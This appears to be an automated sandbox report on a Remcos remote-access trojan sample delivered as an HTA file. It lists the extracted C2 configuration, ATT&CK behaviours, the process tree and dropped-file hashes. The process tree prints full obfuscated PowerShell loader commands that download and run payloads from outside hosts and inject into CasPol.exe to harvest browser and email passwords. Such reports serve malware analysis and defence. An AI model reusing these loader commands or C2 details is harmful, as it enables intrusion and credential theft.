remcos | c76b7544fd10321bd84cd67c6662b7ceb4fe71a87789a09948c6ba690f0fb3ec

Analysis

max time kernel
147s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-01-2025 14:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

nicegirlkissedmewithloverissingmegoodgreatthings.hta
Size

491KB
MD5

4b953e9801ac2ec60bf284162ed6793d
SHA1

090650754ac26c80128fed9b425000f3167551f4
SHA256

c76b7544fd10321bd84cd67c6662b7ceb4fe71a87789a09948c6ba690f0fb3ec
SHA512

f5d19a017a961229db0c10e06fe1da6a78693490d2928a6931ad5945ea93fa6b7bc193ae4c89f527702003293a05e7aba4618bba1c24508ef36015609ab4aa5a
SSDEEP

768:PnQVWUUGY6qZFKN9xv7RmzmBLStxuzHtu1Dj0YNYlBdNpdCb8sOUw8Qp3/GHxwv2:JRkKyMIBK2r0a8i4h

Score

10^/10

remcos zynova collection defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

zynova

millionairedreams2025.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-MGAETQ
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/3296-110-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/5084-112-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/3272-109-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/3296-110-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/3272-109-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
15	4576	powershell.exe
21	2364	powershell.exe
22	2364	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
4576	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2364	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2364 set thread context of 2092	2364	powershell.exe	103
PID 2092 set thread context of 3272	2092	CasPol.exe	110
PID 2092 set thread context of 3296	2092	CasPol.exe	112
PID 2092 set thread context of 5084	2092	CasPol.exe	113

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3560	5008	WerFault.exe	82

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
4576	powershell.exe
4576	powershell.exe
2364	powershell.exe
2364	powershell.exe
3272	CasPol.exe
3272	CasPol.exe
5084	CasPol.exe
5084	CasPol.exe
3272	CasPol.exe
3272	CasPol.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
2092	CasPol.exe
2092	CasPol.exe
2092	CasPol.exe
2092	CasPol.exe
2092	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4576	powershell.exe
Token: SeDebugPrivilege	2364	powershell.exe
Token: SeDebugPrivilege	5084	CasPol.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 5008 wrote to memory of 3716	5008	mshta.exe	86
PID 5008 wrote to memory of 3716	5008	mshta.exe	86
PID 5008 wrote to memory of 3716	5008	mshta.exe	86
PID 3716 wrote to memory of 4576	3716	cmd.exe	88
PID 3716 wrote to memory of 4576	3716	cmd.exe	88
PID 3716 wrote to memory of 4576	3716	cmd.exe	88
PID 4576 wrote to memory of 5040	4576	powershell.exe	90
PID 4576 wrote to memory of 5040	4576	powershell.exe	90
PID 4576 wrote to memory of 5040	4576	powershell.exe	90
PID 5040 wrote to memory of 1040	5040	csc.exe	91
PID 5040 wrote to memory of 1040	5040	csc.exe	91
PID 5040 wrote to memory of 1040	5040	csc.exe	91
PID 4576 wrote to memory of 3316	4576	powershell.exe	98
PID 4576 wrote to memory of 3316	4576	powershell.exe	98
PID 4576 wrote to memory of 3316	4576	powershell.exe	98
PID 3316 wrote to memory of 2364	3316	WScript.exe	99
PID 3316 wrote to memory of 2364	3316	WScript.exe	99
PID 3316 wrote to memory of 2364	3316	WScript.exe	99
PID 2364 wrote to memory of 2092	2364	powershell.exe	103
PID 2364 wrote to memory of 2092	2364	powershell.exe	103
PID 2364 wrote to memory of 2092	2364	powershell.exe	103
PID 2364 wrote to memory of 2092	2364	powershell.exe	103
PID 2364 wrote to memory of 2092	2364	powershell.exe	103
PID 2364 wrote to memory of 2092	2364	powershell.exe	103
PID 2364 wrote to memory of 2092	2364	powershell.exe	103
PID 2364 wrote to memory of 2092	2364	powershell.exe	103
PID 2364 wrote to memory of 2092	2364	powershell.exe	103
PID 2364 wrote to memory of 2092	2364	powershell.exe	103
PID 2092 wrote to memory of 2624	2092	CasPol.exe	109
PID 2092 wrote to memory of 2624	2092	CasPol.exe	109
PID 2092 wrote to memory of 2624	2092	CasPol.exe	109
PID 2092 wrote to memory of 3272	2092	CasPol.exe	110
PID 2092 wrote to memory of 3272	2092	CasPol.exe	110
PID 2092 wrote to memory of 3272	2092	CasPol.exe	110
PID 2092 wrote to memory of 3272	2092	CasPol.exe	110
PID 2092 wrote to memory of 4528	2092	CasPol.exe	111
PID 2092 wrote to memory of 4528	2092	CasPol.exe	111
PID 2092 wrote to memory of 4528	2092	CasPol.exe	111
PID 2092 wrote to memory of 3296	2092	CasPol.exe	112
PID 2092 wrote to memory of 3296	2092	CasPol.exe	112
PID 2092 wrote to memory of 3296	2092	CasPol.exe	112
PID 2092 wrote to memory of 3296	2092	CasPol.exe	112
PID 2092 wrote to memory of 5084	2092	CasPol.exe	113
PID 2092 wrote to memory of 5084	2092	CasPol.exe	113
PID 2092 wrote to memory of 5084	2092	CasPol.exe	113
PID 2092 wrote to memory of 5084	2092	CasPol.exe	113

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\nicegirlkissedmewithloverissingmegoodgreatthings.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5008
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 1344
  2⤵
  - Program crash
  PID:3560
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C pOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; INVoke-eXPreSsIOn($(INVoke-EXprEsSIoN('[SySTeM.tEXT.eNCOdinG]'+[CHaR]58+[ChaR]58+'uTf8.GEtStRinG([SySTEM.conVErt]'+[CHar]58+[chAr]0x3a+'fROmbaSE64StRINg('+[chAr]34+'JGdqUnh0USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1CZXJkZUZJbklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlscWVNcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUlpLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5bm8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbFUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRWSmJXenhxdmwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlB0dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIWnpOcERwU0VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRnalJ4dFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS43L3hhbXBwL2trYi9uaWNlZ2lybHdhbnRtZXRva2lzc2hlcmxpcHN3ZWxsd2l0aG15bGlwcy50SUYiLCIkZW5WOkFQUERBVEFcbmljZWdpcmx3YW50bWV0b2tpc3NoZXJsaXBzd2VsbHdpdGhteWxpcC52YlMiLDAsMCk7U3RBUlQtU2xlZXAoMyk7U1RhcnQtcHJPQ2VTcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pY2VnaXJsd2FudG1ldG9raXNzaGVybGlwc3dlbGx3aXRobXlsaXAudmJTIg=='+[ChAr]0x22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3716
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; INVoke-eXPreSsIOn($(INVoke-EXprEsSIoN('[SySTeM.tEXT.eNCOdinG]'+[CHaR]58+[ChaR]58+'uTf8.GEtStRinG([SySTEM.conVErt]'+[CHar]58+[chAr]0x3a+'fROmbaSE64StRINg('+[chAr]34+'JGdqUnh0USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1CZXJkZUZJbklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlscWVNcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUlpLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5bm8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbFUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRWSmJXenhxdmwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlB0dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIWnpOcERwU0VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRnalJ4dFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS43L3hhbXBwL2trYi9uaWNlZ2lybHdhbnRtZXRva2lzc2hlcmxpcHN3ZWxsd2l0aG15bGlwcy50SUYiLCIkZW5WOkFQUERBVEFcbmljZWdpcmx3YW50bWV0b2tpc3NoZXJsaXBzd2VsbHdpdGhteWxpcC52YlMiLDAsMCk7U3RBUlQtU2xlZXAoMyk7U1RhcnQtcHJPQ2VTcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pY2VnaXJsd2FudG1ldG9raXNzaGVybGlwc3dlbGx3aXRobXlsaXAudmJTIg=='+[ChAr]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4576
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yt4nubdk\yt4nubdk.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5040
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB239.tmp" "c:\Users\Admin\AppData\Local\Temp\yt4nubdk\CSC5A7E953911DD41839B9AF5C8B4C588C.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1040
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicegirlwantmetokissherlipswellwithmylip.vbS"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3316
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA4ADgAMwAvADQAMgAzAC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwA/ADEANwAzADcAMQAyADQAOQA4ADAAJwA7ACAAdAByAHkAIAB7ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACAAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACAAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAaQBmACAAKAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAApACAAewAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACAAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJABtAGUAdABoAG8AZAAgAD0AIABbAFIAdQBtAHAALgBDAGwAYQBzAHMAOQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAHMAbQBlAHQAaABvAGQAXwAyACcAKQA7ACAAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdAEAAKAAnAHQAeAB0AC4AcwBnAG4AaQBoAHQAeQByAGUAdgBlAHIAbwBmAGwAawB1AGYAaQB0AHUAYQBlAGIAeQByAGUAdgBlAHIAYQBzAGwAcgBpAGcAdABoAGcAaQBuAC8AYgBrAGsALwBwAHAAbQBhAHgALwA3AC4ANQAxADIALgAwADEAMgAuADIAOQAxAC8ALwA6AHAAdAB0AGgAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBmAGEAbABzAGUAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkAOwAgAH0AIAB9ACAAYwBhAHQAYwBoACAAewAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJwBFAHIAcgBvADoAIAAkAF8AJwA7ACAAfQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2364
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:2092
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\uyihinbl"
        7⤵
        
        PID:2624
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\uyihinbl"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3272
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\wsnrjglfayk"
        7⤵
        
        PID:4528
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\wsnrjglfayk"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:3296
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\huskkqegogceugh"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5008 -ip 5008
1⤵
PID:628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
134f090ef6b5f3fa123de430f76118a2

SHA1
f29d1c23e06282229afefccd88c26c6cdba532f4

SHA256
536ea8f7dddeac159190eea3354c48ab405d0bdda4c6447bc7ebdf1795194ac3

SHA512
331a87603568e6ff4ea241fc71f8364d884a563820006e5201ef073f5e21d08c27284930e9473b65e9479b9b2ea0e10445d680f276d9b92ffc195813fec90ddd

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB239.tmp

Filesize
1KB

MD5
842b7ed5c0f577b1aac5e8cb574abe43

SHA1
7b075ab6ccce46047574aa5ea80d8d66d2e47173

SHA256
9766b4ad18b1761f9cd716363f2932c7172380ed2e53ffc08de773456b46609c

SHA512
b13eba9a7b244a0ebf9a3b5ce380179ad5cd5b5b0d57fc2a2748e11cd064a754e90afdead66e68be1f0837cf13770c3d850fd1147cf89d79a10d0158b055f736

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fkdiakjb.lhn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\uyihinbl

Filesize
4KB

MD5
c3c5f2de99b7486f697634681e21bab0

SHA1
00f90d495c0b2b63fde6532e033fdd2ade25633d

SHA256
76296dc29f718988107d35d0e0b835c2bf3fc7405e79e5121aa4738f82b51582

SHA512
7c60ffdc093de30e793d20768877f2f586bee3e948767871f9a1139252d5d2f593ba6f88ce0ed5f72c79faddb26186792df0581e4b6c84d405c44d9d12f951b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\yt4nubdk\yt4nubdk.dll

Filesize
3KB

MD5
a4ab171db923863803dfe6081bbdf940

SHA1
afde497c7666639a874ca1fd42ce9da6c526a958

SHA256
30cadddb66233913b8e3e54ec9fe88628ab0772a24632ba426c10dd67033b064

SHA512
b1afc92d8bf698b927f724cc434ebaeca515742b8c32c800948cf8f17fac50ccd960abf8ca9c8ed6a67ab3becef4341aa1bda09059719b56a79a7754ea3c880e

Download Submit
C:\Users\Admin\AppData\Roaming\nicegirlwantmetokissherlipswellwithmylip.vbS

Filesize
213KB

MD5
b14ef4fa92414ea1658977a049f15306

SHA1
11e59f935817673e2b68cfd36e4ce93d15034714

SHA256
a6f979fe5ca109e929031fd0811506343b3089a13300438be24070650c6b6bf3

SHA512
8b627fd09767ba773acdbcce52b646b1b819b261b72c17289d443a6c7e504f34b3402a64f73d48fef893d7d38dfbeef213ed5218c211558428307d69a03f9630

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yt4nubdk\CSC5A7E953911DD41839B9AF5C8B4C588C.TMP

Filesize
652B

MD5
537767bd32eff0e18ad0194618fc4d79

SHA1
289051d153a59483f2f85e6a0b0b85e8ae67dd09

SHA256
110799b8860e3543905b5bab8c852e4eb642b6f58ad536cb96e9c770e5e9a2dc

SHA512
0dd73b9fd8453b6a3075d4de79706b9c3baa38e3f44fd589474e310ce12b8bb0e93bf4ad3e53041a28690af45a0e49904012db33f496e1643bdbfb668bae4c3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yt4nubdk\yt4nubdk.0.cs

Filesize
478B

MD5
680c55127532e413a19eddb51b0cb473

SHA1
7d279e255bc675f1c09df8b210ee4472b5d3b8b6

SHA256
fdd40f201088921031cf300fdce7ca0be6e458b70d0f5df699cf6a0cc33a7515

SHA512
27a542c554c27adf777c741eb218b7a0634392abced081722b43c51066dfb49d604473a9df4b4e257879355cb966882431286f7bbb2ed5d8a23840d837127205

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yt4nubdk\yt4nubdk.cmdline

Filesize
369B

MD5
cb0f7c538a01b24079edfde3b13af133

SHA1
30539ff9ca3d17b71d271316541bd790eba520c6

SHA256
c554922fb1b7129e9785621f6d5b33a5c657197a4d6364ab8ff4e601af647dba

SHA512
a8392ae87de5de508f83d137b25b93945cb69b2c7e0eb00b1398afd13ad3ea13e66c1f3ad1800c980bf75c1d38739d43639507ddd0af4bc0f19c56eb3f30e752

Download Submit
memory/2092-125-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2092-129-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2092-122-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
